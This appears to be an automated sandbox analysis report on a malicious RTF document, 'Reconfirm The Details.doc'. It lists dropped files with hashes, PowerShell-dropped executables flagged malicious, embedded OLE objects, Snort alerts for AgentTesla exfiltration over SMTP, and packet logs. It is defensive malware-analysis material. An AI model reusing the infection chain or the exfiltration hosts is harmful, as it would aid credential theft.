                                                                                                              Size (bytes):93
                                                                                                              Entropy (8bit):4.737415332721156
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:bDuMJlv2LQhk+UmX1zQQhk+Uv:bCk28hBLhY
                                                                                                              MD5:888B27FA8FB2022F87573241083A8C5B
                                                                                                              SHA1:419994E988722595417CDACA849241DFB646366F
                                                                                                              SHA-256:AE627F224CBF7D5A1B449A108B41AFDA558623C92E4A001A16059761D2000232
                                                                                                              SHA-512:54D6A0A3BBEDCB8D901CC66348FFA102F7F7403C07CFF24D77D9F7F8EF03D56AEC41B33B1B5B108C47650B7C0F1EDBB9563E3B97114999C260A020AE0E06F81E
                                                                                                              Malicious:false
                                                                                                              Preview: [folders]..Templates.LNK=0..Reconfirm The Details.LNK=0..[doc]..Reconfirm The Details.LNK=0..
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):162
                                                                                                              Entropy (8bit):2.5038355507075254
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                                              Malicious:false
                                                                                                              Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2
                                                                                                              Entropy (8bit):1.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Qn:Qn
                                                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                              Malicious:false
                                                                                                              Preview: ..
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8016
                                                                                                              Entropy (8bit):3.5801138363759324
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:chQCQMqGqvsqvJCwo0iz8hQCQMqGqvsEHyqvJCwormizKAYDHxiKXX3lUVCiA2:cW7o0iz8WvHnormizKZiKXXriA2
                                                                                                              MD5:AAE46096174D979460091E4A6CF9B600
                                                                                                              SHA1:09FE7E96EFA17FCF1A9244BE0643E45C96C766F3
                                                                                                              SHA-256:EE253621EEE10EABCFD8BD0560CE745872924071DAE5FCBABC17D4F00CF25704
                                                                                                              SHA-512:433429676CFE542084E780BFE3BBAF83784EEEFB0900965D3C950720590213B67F2D5FC54774AB978F95A6C29099D6D445949E9D47E4D78CB859EEDB238FE125
                                                                                                              Malicious:false
                                                                                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8016
                                                                                                              Entropy (8bit):3.5801138363759324
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:chQCQMqGqvsqvJCwo0iz8hQCQMqGqvsEHyqvJCwormizKAYDHxiKXX3lUVCiA2:cW7o0iz8WvHnormizKZiKXXriA2
                                                                                                              MD5:AAE46096174D979460091E4A6CF9B600
                                                                                                              SHA1:09FE7E96EFA17FCF1A9244BE0643E45C96C766F3
                                                                                                              SHA-256:EE253621EEE10EABCFD8BD0560CE745872924071DAE5FCBABC17D4F00CF25704
                                                                                                              SHA-512:433429676CFE542084E780BFE3BBAF83784EEEFB0900965D3C950720590213B67F2D5FC54774AB978F95A6C29099D6D445949E9D47E4D78CB859EEDB238FE125
                                                                                                              Malicious:false
                                                                                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QOH1SFJ01YDJGSRFKM6L.temp
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8016
                                                                                                              Entropy (8bit):3.5801138363759324
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:chQCQMqGqvsqvJCwo0iz8hQCQMqGqvsEHyqvJCwormizKAYDHxiKXX3lUVCiA2:cW7o0iz8WvHnormizKZiKXXriA2
                                                                                                              MD5:AAE46096174D979460091E4A6CF9B600
                                                                                                              SHA1:09FE7E96EFA17FCF1A9244BE0643E45C96C766F3
                                                                                                              SHA-256:EE253621EEE10EABCFD8BD0560CE745872924071DAE5FCBABC17D4F00CF25704
                                                                                                              SHA-512:433429676CFE542084E780BFE3BBAF83784EEEFB0900965D3C950720590213B67F2D5FC54774AB978F95A6C29099D6D445949E9D47E4D78CB859EEDB238FE125
                                                                                                              Malicious:false
                                                                                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SSOY99TCA63S5VSW1UNJ.temp
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8016
                                                                                                              Entropy (8bit):3.5801138363759324
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:chQCQMqGqvsqvJCwo0iz8hQCQMqGqvsEHyqvJCwormizKAYDHxiKXX3lUVCiA2:cW7o0iz8WvHnormizKZiKXXriA2
                                                                                                              MD5:AAE46096174D979460091E4A6CF9B600
                                                                                                              SHA1:09FE7E96EFA17FCF1A9244BE0643E45C96C766F3
                                                                                                              SHA-256:EE253621EEE10EABCFD8BD0560CE745872924071DAE5FCBABC17D4F00CF25704
                                                                                                              SHA-512:433429676CFE542084E780BFE3BBAF83784EEEFB0900965D3C950720590213B67F2D5FC54774AB978F95A6C29099D6D445949E9D47E4D78CB859EEDB238FE125
                                                                                                              Malicious:false
                                                                                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SX36BOTN39J9C9J03BTG.temp
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8016
                                                                                                              Entropy (8bit):3.5818435904178987
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:chQCQMqGqvsqvJCwo0iz8hQCQMqGqvsEHyqvJCwormiztAKrVHxipxpyX3lUVCih:cW7o0iz8WvHnormizt5Pif8XriA2
                                                                                                              MD5:77F3843A1E78AA18EC48DEDA062DAA8C
                                                                                                              SHA1:23318033CE15969125FD192C56E3BE5955F77C74
                                                                                                              SHA-256:DEAFC5ECB755BBE38997255704446A06CDBB6B0BC77EA28C55C9EE8167171482
                                                                                                              SHA-512:E12E25FE49643FAD7D8EB33840D756DBA07B87A7288E2834C774CD3E54B256D5BD2DC2A8F86DEAEFBDAFFF7FF8CBEF7D41623877400279BEEC4A706F95149290
                                                                                                              Malicious:false
                                                                                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U7TXBSPCBZC5YKNEVYY5.temp
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8016
                                                                                                              Entropy (8bit):3.5801138363759324
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:chQCQMqGqvsqvJCwo0iz8hQCQMqGqvsEHyqvJCwormizKAYDHxiKXX3lUVCiA2:cW7o0iz8WvHnormizKZiKXXriA2
                                                                                                              MD5:AAE46096174D979460091E4A6CF9B600
                                                                                                              SHA1:09FE7E96EFA17FCF1A9244BE0643E45C96C766F3
                                                                                                              SHA-256:EE253621EEE10EABCFD8BD0560CE745872924071DAE5FCBABC17D4F00CF25704
                                                                                                              SHA-512:433429676CFE542084E780BFE3BBAF83784EEEFB0900965D3C950720590213B67F2D5FC54774AB978F95A6C29099D6D445949E9D47E4D78CB859EEDB238FE125
                                                                                                              Malicious:false
                                                                                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8016
                                                                                                              Entropy (8bit):3.5818435904178987
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:chQCQMqGqvsqvJCwo0iz8hQCQMqGqvsEHyqvJCwormiztAKrVHxipxpyX3lUVCih:cW7o0iz8WvHnormizt5Pif8XriA2
                                                                                                              MD5:77F3843A1E78AA18EC48DEDA062DAA8C
                                                                                                              SHA1:23318033CE15969125FD192C56E3BE5955F77C74
                                                                                                              SHA-256:DEAFC5ECB755BBE38997255704446A06CDBB6B0BC77EA28C55C9EE8167171482
                                                                                                              SHA-512:E12E25FE49643FAD7D8EB33840D756DBA07B87A7288E2834C774CD3E54B256D5BD2DC2A8F86DEAEFBDAFFF7FF8CBEF7D41623877400279BEEC4A706F95149290
                                                                                                              Malicious:false
                                                                                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                              C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
                                                                                                              Process:C:\Users\user\AppData\Roaming\taskmg.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):777216
                                                                                                              Entropy (8bit):7.787171245644076
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:rBzcmhiTcQfDYWTRCFySBx5CC6Z0KbS7gdqszdlLhrpGreLM8vZw+JS1nHLE2D2W:rBomhiQYYWEFyw5USIHLu4vG7Hc95i11
                                                                                                              MD5:815982590DE5E574ABB8A0310826E200
                                                                                                              SHA1:6C41343A2E25F932F901E53E615CC083209F6A65
                                                                                                              SHA-256:56960095EA2EDA1C680F9DF0937A792E9BCA7AF4922931540688097E6D2A43BB
                                                                                                              SHA-512:4C343183EC50C6887B758ED1FA40478BC87A0944792944D42C9978EBDA94B08A9D2E3E77B039963BF0A3EC2D5090BBB7FBA9CF0486EBE8C00AC393A2361FCE98
                                                                                                              Malicious:true
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..a..............0.................. ........@.. .......................@............@.................................\...O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........H...!..........Lj................................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                                                                                              C:\Users\user\AppData\Roaming\taskmg.exe
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):777216
                                                                                                              Entropy (8bit):7.787171245644076
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:rBzcmhiTcQfDYWTRCFySBx5CC6Z0KbS7gdqszdlLhrpGreLM8vZw+JS1nHLE2D2W:rBomhiQYYWEFyw5USIHLu4vG7Hc95i11
                                                                                                              MD5:815982590DE5E574ABB8A0310826E200
                                                                                                              SHA1:6C41343A2E25F932F901E53E615CC083209F6A65
                                                                                                              SHA-256:56960095EA2EDA1C680F9DF0937A792E9BCA7AF4922931540688097E6D2A43BB
                                                                                                              SHA-512:4C343183EC50C6887B758ED1FA40478BC87A0944792944D42C9978EBDA94B08A9D2E3E77B039963BF0A3EC2D5090BBB7FBA9CF0486EBE8C00AC393A2361FCE98
                                                                                                              Malicious:true
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..a..............0.................. ........@.. .......................@............@.................................\...O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........H...!..........Lj................................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                                                                                              C:\Users\user\Desktop\~$confirm The Details.doc
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):162
                                                                                                              Entropy (8bit):2.5038355507075254
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                                              Malicious:false
                                                                                                              Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:Rich Text Format data, unknown version
                                                                                                              Entropy (8bit):3.60648819236507
                                                                                                              TrID:
                                                                                                              • Rich Text Format (5005/1) 55.56%
                                                                                                              • Rich Text Format (4004/1) 44.44%
                                                                                                              File name:Reconfirm The Details.doc
                                                                                                              File size:393215
                                                                                                              MD5:9a7ea1172bf1250005e0fefce04f604f
                                                                                                              SHA1:3df0782fc6ace41e15ca7c98277c79c128453d10
                                                                                                              SHA256:80071fbb7234239c46ced3c6f0fd9aa7dbeafe79d7bfeed7993d51a69c4da006
                                                                                                              SHA512:e7335ac3fddfaea8211273fb070d071436e880d231c4a9e4d01f44aa7a0b680779b30ca6cd09c19759f2e0c7f6aabb6289fdb9fe02858f1dec063085e318346f
                                                                                                              SSDEEP:1536:iV/f9DDDDDDDtyLy0gvQPmfSoBi59Ujs4Qjw7hKfedzFz76mAg5eeVhMDw5wfLj:iHDDDDDDDIgHLdzFtr5RDAw5wff
                                                                                                              File Content Preview:{\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\stshfBi31507\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647

                                                                                                              File Icon

                                                                                                              Icon Hash:e4eea2aaa4b4b4a4

                                                                                                              Static RTF Info

                                                                                                              Objects

                                                                                                              IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                                              0000007DAh2embeddedpackage97620abdtfhgXgeghDp.ScTC:\nsdsTggH\abdtfhgXGeghDp.ScTC:\CbkepaDw\abdtfhghgeghDp.ScTno
                                                                                                              1000321F3h2embeddedOLE2LInk2560no

                                                                                                              Network Behavior

                                                                                                              Snort IDS Alerts

                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                              11/25/21-18:15:50.830021TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49167587192.168.2.22208.91.199.224
                                                                                                              11/25/21-18:16:01.234218TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49168587192.168.2.22208.91.199.225
                                                                                                              11/25/21-18:16:13.733229TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49169587192.168.2.22208.91.199.223
                                                                                                              11/25/21-18:16:48.169827TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49172587192.168.2.22208.91.199.224
                                                                                                              11/25/21-18:16:56.612952TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49173587192.168.2.22208.91.199.224
                                                                                                              11/25/21-18:16:57.883879TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49174587192.168.2.22208.91.198.143

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 25, 2021 18:14:53.830594063 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:53.976701021 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:53.976802111 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:53.977502108 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.124871969 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.124969006 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.125030041 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.125087976 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.125258923 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.125307083 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.125312090 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.125314951 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.271748066 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.271838903 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.272073984 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.272281885 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.272366047 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.272474051 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.272543907 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.273787975 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.273843050 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.273931026 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.273947001 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.273987055 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.273993969 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.274039984 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.274130106 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.418554068 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.418601036 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.418621063 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.418642998 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.418859005 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.419271946 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.419298887 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.419332981 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.419348001 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.419373989 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.419418097 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.419424057 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.419465065 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.420228958 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.420283079 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.420347929 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.420398951 CET4916580192.168.2.22173.232.204.89
